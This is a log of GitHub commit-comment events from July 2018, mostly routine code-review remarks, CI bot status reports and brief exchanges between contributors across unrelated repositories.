{"id":"7955533084","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29683614,"position":23,"line":23,"path":"cap2/2_6_5.sql","commit_id":"62ed7068c0606399e6d9a52853732d0affd3b0ae","created_at":"2018-07-12T11:06:11Z","updated_at":"2018-07-12T11:06:11Z","author_association":"COLLABORATOR","body":"山本　指摘\r\nカラム名が「?」になっている。（2-6-2と同様の内容）"}},"created_at":"2018-07-12T11:06:11Z"}
{"id":"7955533551","type":"CommitCommentEvent","actor":{"login":"JohnFLewis"},"repo":{"name":"miraheze/CreateWiki"},"payload":{"comment":{"id":29683615,"position":null,"line":null,"path":null,"commit_id":"3506275a6b6279d177dd396cc66b82429b15f44a","created_at":"2018-07-12T11:06:16Z","updated_at":"2018-07-12T11:06:16Z","author_association":"MEMBER","body":"plus it's nice giving granular config to people who use it if they chose to have a different perm set up."}},"created_at":"2018-07-12T11:06:16Z"}
{"id":"7955533685","type":"CommitCommentEvent","actor":{"login":"dsh2dsh"},"repo":{"name":"KRodinn/OGSR-Engine"},"payload":{"comment":{"id":29683617,"position":20,"line":986,"path":"ogsr_engine/xrGame/WeaponMagazined.cpp","commit_id":"eaec6351222bf89c64e0d58e9911b231586446ed","created_at":"2018-07-12T11:06:18Z","updated_at":"2018-07-12T11:06:18Z","author_association":"COLLABORATOR","body":"@joye-ramone вот эти две строчки - это что должно быть? У меня тут вылетает. Полагаю, что из-за отсутствия m_sScopeName.\r\n"}},"created_at":"2018-07-12T11:06:18Z"}
{"id":"7955534576","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":29683618,"position":null,"line":null,"path":null,"commit_id":"09a72f5dd5e24ec6e802f596db0967f7bb863703","created_at":"2018-07-12T11:06:29Z","updated_at":"2018-07-12T11:06:29Z","author_association":"MEMBER","body":"BTW. the [code-style](https://github.com/curl/curl/blob/master/docs/CODE_STYLE.md#no-assignments-in-conditions) says *no assignment in conditions*. This file breaks that rule in 2 places AFAICS. So, is the rule too strict?.\r\n\r\nIn the case of (line 1538): \r\n```c\r\n    if(name)\r\n      while((j = X509_NAME_get_index_by_NID(name, NID_commonName, i)) >= 0)\r\n        i = j;\r\n```\r\n\r\nshould it be like:\r\n```c\r\n    while(name) {\r\n      j = X509_NAME_get_index_by_NID(name, NID_commonName, i);\r\n      if (j < 0)\r\n         break;\r\n      i = j;\r\n    }\r\n```\r\n"}},"created_at":"2018-07-12T11:06:29Z"}
{"id":"7955545086","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29683633,"position":null,"line":null,"path":null,"commit_id":"9f3fa116cf2f0606eb37f201ab59fa4c6dfb7688","created_at":"2018-07-12T11:08:50Z","updated_at":"2018-07-12T11:08:50Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-110849 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180712-110849\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-12T11:08:50Z"}
{"id":"7955547360","type":"CommitCommentEvent","actor":{"login":"cvweiss"},"repo":{"name":"ddavaham/levelv"},"payload":{"comment":{"id":29683641,"position":null,"line":null,"path":null,"commit_id":"e82fc3f6c65f3b61620ed1fdbb26f220c2e691cb","created_at":"2018-07-12T11:09:22Z","updated_at":"2018-07-12T11:09:22Z","author_association":"NONE","body":"I say put the clock back, but have it in H:i format with no seconds. It's what I do on zkill and it works well."}},"created_at":"2018-07-12T11:09:22Z"}
{"id":"7955553802","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29683657,"position":10,"line":10,"path":"cap3/3_1_1.sql","commit_id":"8286e78118cb209d7c1e77af50659ea9ce9a93c5","created_at":"2018-07-12T11:10:52Z","updated_at":"2018-07-12T11:10:52Z","author_association":"COLLABORATOR","body":"山本　指摘\r\nテキストを見ると、小文字の「s」ではなく、大文字の「S」です。\r\n大文字小文字についても意識するようにしてください。"}},"created_at":"2018-07-12T11:10:52Z"}
{"id":"7955557172","type":"CommitCommentEvent","actor":{"login":"maxreb"},"repo":{"name":"maxreb/goastick_led"},"payload":{"comment":{"id":29683670,"position":null,"line":null,"path":null,"commit_id":"04a089e08af05ca2c9acd5e6d2f0448f1da41875","created_at":"2018-07-12T11:11:37Z","updated_at":"2018-07-12T11:11:37Z","author_association":"OWNER","body":"closes #2 "}},"created_at":"2018-07-12T11:11:37Z"}
{"id":"7955558518","type":"CommitCommentEvent","actor":{"login":"0pdd"},"repo":{"name":"zold-io/zold"},"payload":{"comment":{"id":29683672,"position":null,"line":null,"path":null,"commit_id":"d659e660c6df319f7f7135217d1fb10e5cf6b8c5","created_at":"2018-07-12T11:11:55Z","updated_at":"2018-07-12T11:11:55Z","author_association":"COLLABORATOR","body":"Puzzle `306-7716d232` discovered in   [`test/commands/test_node.rb`](  https://github.com/zold-io/zold/blob/master/test/commands/test_node.rb)   and submitted as #389. Please, remember that the puzzle was not   necessarily added in this particular commit. Maybe it was added earlier, but   we discovered it only now."}},"created_at":"2018-07-12T11:11:55Z"}
{"id":"7955559099","type":"CommitCommentEvent","actor":{"login":"atulkathait"},"repo":{"name":"johnnykeem/Bioinformatics-Analysis"},"payload":{"comment":{"id":29683674,"position":null,"line":null,"path":null,"commit_id":"8cdc05359b0b8c0bfcb61208d2ea5d7e3a5e4da1","created_at":"2018-07-12T11:12:04Z","updated_at":"2018-07-12T11:12:04Z","author_association":"NONE","body":"Hi\r\nI am very beginner, Can I get your sample file, which you are running here"}},"created_at":"2018-07-12T11:12:04Z"}
{"id":"7955559394","type":"CommitCommentEvent","actor":{"login":"siteshwar"},"repo":{"name":"ast-open/ast-open"},"payload":{"comment":{"id":29683675,"position":2,"line":2,"path":"README.md","commit_id":"9ac6ffcd34a88098db29b630220c5b6fc798cb43","created_at":"2018-07-12T11:12:09Z","updated_at":"2018-07-12T11:12:09Z","author_association":"NONE","body":"Since it came on my radar, I would like to make couple of points:\r\n\r\n- If you wish, you should be able to keep this project under [AT&T umbrella](https://github.com/att/) to get better visibility. Lefteris Koutsofios should be able to set up a repository for you.\r\n\r\n- Do not start building on top of last beta release. Instead pick up the last stable release as it has less bugs.\r\n\r\nDespite of my position in current ksh upstream, I encourage you to to continue working on this toolkit."}},"created_at":"2018-07-12T11:12:09Z"}
{"id":"7955566429","type":"CommitCommentEvent","actor":{"login":"Awzaw"},"repo":{"name":"r7vmc/ApiUpdaterDP"},"payload":{"comment":{"id":29683687,"position":null,"line":null,"path":null,"commit_id":"9f879560e3bdb6bd30e5a2a728930204a7fdcf0d","created_at":"2018-07-12T11:13:46Z","updated_at":"2018-07-12T11:13:46Z","author_association":"NONE","body":"The most important thing is what you learned writing it, not getting accepted on Poggit release!"}},"created_at":"2018-07-12T11:13:46Z"}
{"id":"7955569929","type":"CommitCommentEvent","actor":{"login":"siteshwar"},"repo":{"name":"ast-open/ast-open"},"payload":{"comment":{"id":29683690,"position":1,"line":1,"path":"LICENSE","commit_id":"9ac6ffcd34a88098db29b630220c5b6fc798cb43","created_at":"2018-07-12T11:14:35Z","updated_at":"2018-07-12T11:14:35Z","author_association":"NONE","body":"Actual license is Eclipse Public License - v 1.0"}},"created_at":"2018-07-12T11:14:35Z"}
{"id":"7955577570","type":"CommitCommentEvent","actor":{"login":"r7vmc"},"repo":{"name":"r7vmc/ApiUpdaterDP"},"payload":{"comment":{"id":29683710,"position":null,"line":null,"path":null,"commit_id":"9f879560e3bdb6bd30e5a2a728930204a7fdcf0d","created_at":"2018-07-12T11:16:17Z","updated_at":"2018-07-12T11:16:17Z","author_association":"OWNER","body":"@Awzaw Yes of course"}},"created_at":"2018-07-12T11:16:17Z"}
{"id":"7955585454","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":29683727,"position":11,"line":0,"path":"UM/Qt/Bindings/MainWindow.py","commit_id":"c20418405f6c10588b456e9b72e5e3999c7f7a35","created_at":"2018-07-12T11:18:05Z","updated_at":"2018-07-12T11:18:05Z","author_association":"CONTRIBUTOR","body":"No problem. Now it sounds like a WIP and once merged I can imagine that it might be confusing. At least I expect that it will be tested and verified that it works before actually merging it. 😉\n\nHowever, keep up the good work 🙂👌"}},"created_at":"2018-07-12T11:18:05Z"}
{"id":"7955585529","type":"CommitCommentEvent","actor":{"login":"JacquesLucke"},"repo":{"name":"JacquesLucke/animation_nodes"},"payload":{"comment":{"id":29683728,"position":14,"line":109,"path":"animation_nodes/nodes/spline/splines_from_edges_utils.pyx","commit_id":"7c9f56d38d708ba11b89c0a062741825d38399cd","created_at":"2018-07-12T11:18:06Z","updated_at":"2018-07-12T11:18:06Z","author_association":"OWNER","body":"inside the function it would actually be nice to \"convert\" the string to a boolean for performance reasons ;D"}},"created_at":"2018-07-12T11:18:06Z"}
{"id":"7955589086","type":"CommitCommentEvent","actor":{"login":"rishabhkalra96"},"repo":{"name":"rishabhkalra96/PWA_Example"},"payload":{"comment":{"id":29683736,"position":null,"line":null,"path":null,"commit_id":"24d4a4c6c9e366c710c2580d38af64c35b2dde77","created_at":"2018-07-12T11:18:55Z","updated_at":"2018-07-12T11:18:55Z","author_association":"OWNER","body":"Note that a promise is used to keep track of an async task executed\r\nif works on two states/arguments, success and failure\r\nif the promise is able to execute certain process successfuly, it returns a success resolve which can then be chained using 'then()' however, if any error occurs, that can be catched by the 'catch()' as shown in this commit"}},"created_at":"2018-07-12T11:18:55Z"}
{"id":"7955592280","type":"CommitCommentEvent","actor":{"login":"weishi10141993"},"repo":{"name":"weishi10141993/ALP"},"payload":{"comment":{"id":29683743,"position":null,"line":null,"path":null,"commit_id":"ec14b41c76bbc458cdb2a6516c4eb329fb09db2d","created_at":"2018-07-12T11:19:39Z","updated_at":"2018-07-12T11:19:39Z","author_association":"OWNER","body":"wget --no-check-certificate https://github.com/weishi10141993/ALP/raw/master/ALP.tar.gz"}},"created_at":"2018-07-12T11:19:39Z"}
{"id":"7955593386","type":"CommitCommentEvent","actor":{"login":"JacquesLucke"},"repo":{"name":"JacquesLucke/animation_nodes"},"payload":{"comment":{"id":29683744,"position":12,"line":50,"path":"animation_nodes/nodes/spline/splines_from_edges.py","commit_id":"2d3646ef2e8ab1674d64e41b4c603002d7c16e99","created_at":"2018-07-12T11:19:55Z","updated_at":"2018-07-12T11:19:55Z","author_association":"OWNER","body":"`len(edgeIndices) == 0` is wrong here."}},"created_at":"2018-07-12T11:19:55Z"}
{"id":"7955598446","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29683756,"position":22,"line":22,"path":"cap3/3_1_4.sql","commit_id":"bf4abaa142e7255f3e446c974f1e652fcb6191c5","created_at":"2018-07-12T11:21:02Z","updated_at":"2018-07-12T11:21:02Z","author_association":"COLLABORATOR","body":"山本　指摘\r\nSQLにダブルクォートは使えません。\r\nまた、「下記のようにする」の「下記」が見当たりません。\r\n\r\n確認をこめて実行結果についても記載してください。"}},"created_at":"2018-07-12T11:21:02Z"}
{"id":"7955600092","type":"CommitCommentEvent","actor":{"login":"mgomezch"},"repo":{"name":"zalando-incubator/postgres-operator"},"payload":{"comment":{"id":29683759,"position":582,"line":750,"path":"pkg/cluster/k8sres.go","commit_id":"25a306244f69eb3f25c0a780816122a99cc30e3b","created_at":"2018-07-12T11:21:22Z","updated_at":"2018-07-12T11:21:22Z","author_association":"MEMBER","body":"I'm not entirely sure, but as far as I can tell, `SCALYR_SERVER_HOST` does not need to be defined as mentioned in this comment, as it's always set to the cluster name, and what needs to be defined in the API key, the server URL, and the docker image which isn't mentioned here?"}},"created_at":"2018-07-12T11:21:22Z"}
{"id":"7955605023","type":"CommitCommentEvent","actor":{"login":"OmarSquircleArt"},"repo":{"name":"JacquesLucke/animation_nodes"},"payload":{"comment":{"id":29683766,"position":14,"line":109,"path":"animation_nodes/nodes/spline/splines_from_edges_utils.pyx","commit_id":"7c9f56d38d708ba11b89c0a062741825d38399cd","created_at":"2018-07-12T11:22:27Z","updated_at":"2018-07-12T11:22:27Z","author_association":"CONTRIBUTOR","body":"Oh, didn't notice that, will do."}},"created_at":"2018-07-12T11:22:27Z"}
{"id":"7955606921","type":"CommitCommentEvent","actor":{"login":"zuosu"},"repo":{"name":"zuosu/zuosu.github.io"},"payload":{"comment":{"id":29683769,"position":7,"line":7,"path":"index.html","commit_id":"1801c35553b7948cd2b715f3a8828894cdd5e167","created_at":"2018-07-12T11:22:52Z","updated_at":"2018-07-12T11:22:52Z","author_association":"OWNER","body":"css\r\n"}},"created_at":"2018-07-12T11:22:52Z"}
{"id":"7955609408","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29683772,"position":null,"line":null,"path":null,"commit_id":"86b95408fdd8b8131ad2d8064a71a01920c1db2c","created_at":"2018-07-12T11:23:24Z","updated_at":"2018-07-12T11:23:24Z","author_association":"NONE","body":"fix_restrictive_cli (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2312 of 2312 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-86b95408fdd8b8131ad2d8064a71a01920c1db2c-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-12T11:23:24Z"}
{"id":"7955636720","type":"CommitCommentEvent","actor":{"login":"JacquesLucke"},"repo":{"name":"JacquesLucke/animation_nodes"},"payload":{"comment":{"id":29683884,"position":12,"line":50,"path":"animation_nodes/nodes/spline/splines_from_edges.py","commit_id":"2d3646ef2e8ab1674d64e41b4c603002d7c16e99","created_at":"2018-07-12T11:29:31Z","updated_at":"2018-07-12T11:29:31Z","author_association":"OWNER","body":"yep, something like that."}},"created_at":"2018-07-12T11:29:31Z"}
{"id":"7955640527","type":"CommitCommentEvent","actor":{"login":"michalmuskala"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":29683900,"position":6,"line":2133,"path":"lib/elixir/lib/string.ex","commit_id":"35ac568044aca779d2c000f39cee974cae9cf0c0","created_at":"2018-07-12T11:30:21Z","updated_at":"2018-07-12T11:30:21Z","author_association":"MEMBER","body":"I think `characters` might be not clear enough in the context of unicode. Should it say something like?\r\n\r\n> The maximum atom size is of 255 unicode characters (codepoints)."}},"created_at":"2018-07-12T11:30:21Z"}
{"id":"7955642789","type":"CommitCommentEvent","actor":{"login":"funbringer"},"repo":{"name":"arssher/pg_pathman"},"payload":{"comment":{"id":29683905,"position":23,"line":499,"path":"src/hooks.c","commit_id":"6a60886a6b82a607baf4218dbda01174f1a3faf6","created_at":"2018-07-12T11:30:51Z","updated_at":"2018-07-12T11:30:51Z","author_association":"NONE","body":"Trailing whitespace detected."}},"created_at":"2018-07-12T11:30:51Z"}
{"id":"7955646867","type":"CommitCommentEvent","actor":{"login":"dividedmind"},"repo":{"name":"conjurinc/conjur-policy-parser"},"payload":{"comment":{"id":29683925,"position":4,"line":20,"path":"spec/resolver_spec.rb","commit_id":"a3bb534542f0807f98404cbf1743ddd8b8acbbc5","created_at":"2018-07-12T11:31:46Z","updated_at":"2018-07-12T11:31:46Z","author_association":"NONE","body":"Just wondering: have you tried simply replacing `eq` with `match`?"}},"created_at":"2018-07-12T11:31:46Z"}
{"id":"7955648776","type":"CommitCommentEvent","actor":{"login":"dividedmind"},"repo":{"name":"conjurinc/conjur-policy-parser"},"payload":{"comment":{"id":29683932,"position":null,"line":null,"path":null,"commit_id":"a3bb534542f0807f98404cbf1743ddd8b8acbbc5","created_at":"2018-07-12T11:32:12Z","updated_at":"2018-07-12T11:32:12Z","author_association":"NONE","body":"Just wondering: have you tried simply replacing `eq` with `match`?"}},"created_at":"2018-07-12T11:32:12Z"}
{"id":"7955655148","type":"CommitCommentEvent","actor":{"login":"SheepTester"},"repo":{"name":"gitcowor/prixy"},"payload":{"comment":{"id":29683953,"position":4,"line":17,"path":"index.html","commit_id":"2b56c81ad614b959838b495ec0587ccc36ceed2f","created_at":"2018-07-12T11:33:38Z","updated_at":"2018-07-12T11:33:38Z","author_association":"NONE","body":"Why is this missing a `\">` at the end?"}},"created_at":"2018-07-12T11:33:38Z"}
{"id":"7955661511","type":"CommitCommentEvent","actor":{"login":"adirasmadins"},"repo":{"name":"adirasmadins/adirasmadins.github.io"},"payload":{"comment":{"id":29683969,"position":1,"line":1,"path":"CNAME","commit_id":"37a1e83d9ef97e2ab9b56c9a02e440027247d703","created_at":"2018-07-12T11:35:01Z","updated_at":"2018-07-12T11:35:01Z","author_association":"OWNER","body":"apps.asliborneo.com"}},"created_at":"2018-07-12T11:35:01Z"}
{"id":"7955664799","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29683973,"position":null,"line":null,"path":null,"commit_id":"4d24ede752c17a2c6ecaada81ed007e5cb930e72","created_at":"2018-07-12T11:35:46Z","updated_at":"2018-07-12T11:35:46Z","author_association":"COLLABORATOR","body":"Not really faster than bilinear, therefor brings the best quality ever!\r\n![m05-0608_frame_1](https://user-images.githubusercontent.com/30245296/42630816-77b13ce8-85d8-11e8-82a3-1e303196821c.png)\r\n"}},"created_at":"2018-07-12T11:35:46Z"}
{"id":"7955665059","type":"CommitCommentEvent","actor":{"login":"SheepTester"},"repo":{"name":"gitcowor/prixy"},"payload":{"comment":{"id":29683974,"position":4,"line":17,"path":"index.html","commit_id":"2b56c81ad614b959838b495ec0587ccc36ceed2f","created_at":"2018-07-12T11:35:50Z","updated_at":"2018-07-12T11:35:50Z","author_association":"NONE","body":"My bad. It's also missing a closing `</script>` tag. Full line, fixed:\r\n```html\r\n    <script type=\"text/javascript\" src=\"warns/consolewarn.js\"></script>\r\n```"}},"created_at":"2018-07-12T11:35:50Z"}
{"id":"7955670948","type":"CommitCommentEvent","actor":{"login":"zah"},"repo":{"name":"status-im/nim-http-utils"},"payload":{"comment":{"id":29683988,"position":null,"line":null,"path":null,"commit_id":"b4b8542f6e92a22e5f6b97c94922f02709dbda2e","created_at":"2018-07-12T11:37:09Z","updated_at":"2018-07-12T11:37:09Z","author_association":"MEMBER","body":"Is this some existing C library that was converted to Nim manually? If so, was the original HTTP parsing state machine generated by Ragel or a similar tool? (http://www.colm.net/open-source/ragel/)"}},"created_at":"2018-07-12T11:37:09Z"}
{"id":"7955671874","type":"CommitCommentEvent","actor":{"login":"itaykinnrot"},"repo":{"name":"kaltura/mwEmbed"},"payload":{"comment":{"id":29683991,"position":4,"line":9,"path":"modules/KalturaSupport/resources/mw.ClosedCaptions.js","commit_id":"c45262094430d1ae88675d6afcc5d0e489a3426b","created_at":"2018-07-12T11:37:22Z","updated_at":"2018-07-12T11:37:22Z","author_association":"MEMBER","body":"@eitanavgil  why true by default?"}},"created_at":"2018-07-12T11:37:22Z"}
{"id":"7955672303","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29683992,"position":null,"line":null,"path":null,"commit_id":"cb518f6c517d6cb8b8f8a6e1b3b80f4e963fc0b0","created_at":"2018-07-12T11:37:27Z","updated_at":"2018-07-12T11:37:27Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T11:37:27Z"}
{"id":"7955681217","type":"CommitCommentEvent","actor":{"login":"OmarSquircleArt"},"repo":{"name":"JacquesLucke/animation_nodes"},"payload":{"comment":{"id":29684007,"position":18,"line":79,"path":"animation_nodes/nodes/spline/splines_from_edges_utils.pyx","commit_id":"2aa3c72422b20dddeed0e61630f84e8da533e096","created_at":"2018-07-12T11:39:29Z","updated_at":"2018-07-12T11:39:29Z","author_association":"CONTRIBUTOR","body":"The current one is the reference for each iteration. The next one is computed using the reference (Current) and is in turn used in constructing the lists. Maybe it makes more sense this way."}},"created_at":"2018-07-12T11:39:29Z"}
{"id":"7955682746","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"fujita0622/-WriteTypeSqlDrill"},"payload":{"comment":{"id":29684010,"position":30,"line":30,"path":"cap3/3_2_4.sql","commit_id":"0c2855fcdd65c446caa56f3b53dbdd0fabf1a950","created_at":"2018-07-12T11:39:49Z","updated_at":"2018-07-12T11:39:49Z","author_association":"COLLABORATOR","body":"@fujita0622 \r\n山本　指摘\r\n穴埋め問題であっても、SQLを実行し、実行結果を添付してください。"}},"created_at":"2018-07-12T11:39:49Z"}
{"id":"7955688639","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29684017,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T11:41:10Z","updated_at":"2018-07-12T11:41:10Z","author_association":"NONE","body":"I didnt even know there was a Fireball OTP until i pushed the repository. By spying on my discord, you are violating Discord TOS. Im preparing to contact Discord. Goodbye ::::)"}},"created_at":"2018-07-12T11:41:10Z"}
{"id":"7955690203","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29684020,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-12T11:41:30Z","updated_at":"2018-07-12T11:41:30Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T11:41:30Z"}
{"id":"7955690896","type":"CommitCommentEvent","actor":{"login":"shanutheflash"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29684022,"position":null,"line":null,"path":null,"commit_id":"d6b815613a13adb8b79389f6a394e5c4fec0a9f8","created_at":"2018-07-12T11:41:39Z","updated_at":"2018-07-12T11:41:39Z","author_association":"NONE","body":";--------------;"}},"created_at":"2018-07-12T11:41:39Z"}
{"id":"7955691516","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29684023,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T11:41:48Z","updated_at":"2018-07-12T11:41:48Z","author_association":"NONE","body":"You are also not 21 years old, so stop calling people kids when in reality you are one too."}},"created_at":"2018-07-12T11:41:48Z"}
{"id":"7955691812","type":"CommitCommentEvent","actor":{"login":"MFusseder"},"repo":{"name":"KratosMultiphysics/Kratos"},"payload":{"comment":{"id":29684024,"position":4,"line":19,"path":"applications/StructuralMechanicsApplication/tests/test_adjoint_sensitity_analysis_beam_3d2n_structure.py","commit_id":"871e0c2ffe22c93ed517a1a33dd3e97a11886731","created_at":"2018-07-12T11:41:52Z","updated_at":"2018-07-12T11:41:52Z","author_association":"MEMBER","body":"I removed the `remove_file` with `RemoveFileIfExisting` but not `remove_h5_files` because there is a search included which looks for all h5-files. Thanks for the hint."}},"created_at":"2018-07-12T11:41:52Z"}
{"id":"7955693759","type":"CommitCommentEvent","actor":{"login":"yirkajk"},"repo":{"name":"math1um/objects-invariants-properties"},"payload":{"comment":{"id":29684026,"position":null,"line":null,"path":null,"commit_id":"3e7ba2360136553c7bf20eba929fc6e3ef63dced","created_at":"2018-07-12T11:42:19Z","updated_at":"2018-07-12T11:42:19Z","author_association":"COLLABORATOR","body":"That's how I found this. Progress being made, slowly...\n\nOn Thu, Jul 12, 2018, 4:40 AM Nico Van Cleemput <notifications@github.com>\nwrote:\n\n> Yet again an example of why each method should have a doctest. 😉\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/math1um/objects-invariants-properties/commit/3e7ba2360136553c7bf20eba929fc6e3ef63dced#commitcomment-29681993>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABIUnGAni_4wEsWQoXlCKslTZeA64wHGks5uFwt-gaJpZM4VMb32>\n> .\n>\n"}},"created_at":"2018-07-12T11:42:19Z"}
{"id":"7955696043","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29684029,"position":null,"line":null,"path":null,"commit_id":"ce6ccf1e29f0ce896512a5cf4056fe06f6345589","created_at":"2018-07-12T11:42:52Z","updated_at":"2018-07-12T11:42:52Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-12T11:42:52Z"}
{"id":"7955696976","type":"CommitCommentEvent","actor":{"login":"itsyaboyrocket"},"repo":{"name":"Bob693/PythonLauncher"},"payload":{"comment":{"id":29684030,"position":null,"line":null,"path":null,"commit_id":"d40f2bcb08a03f0b2ea028a803842aff9f8d6c35","created_at":"2018-07-12T11:43:04Z","updated_at":"2018-07-12T11:43:04Z","author_association":"NONE","body":"Nice use of editing comments to abuse Github too."}},"created_at":"2018-07-12T11:43:04Z"}
{"id":"7955701279","type":"CommitCommentEvent","actor":{"login":"shanutheflash"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29684034,"position":null,"line":null,"path":null,"commit_id":"a0850b6bfe870a7f547e2c0205eb6fffd21f4bbe","created_at":"2018-07-12T11:44:00Z","updated_at":"2018-07-12T11:44:00Z","author_association":"NONE","body":"BC gib credits -_-"}},"created_at":"2018-07-12T11:44:00Z"}
{"id":"7955702306","type":"CommitCommentEvent","actor":{"login":"shanutheflash"},"repo":{"name":"Yasir-siddiqui/Joker_dabot"},"payload":{"comment":{"id":29684035,"position":null,"line":null,"path":null,"commit_id":"c25df1a4d77809c67d6a7744e2e3a8940b4bb66c","created_at":"2018-07-12T11:44:14Z","updated_at":"2018-07-12T11:44:14Z","author_association":"NONE","body":"BC gib credits -_-"}},"created_at":"2018-07-12T11:44:14Z"}
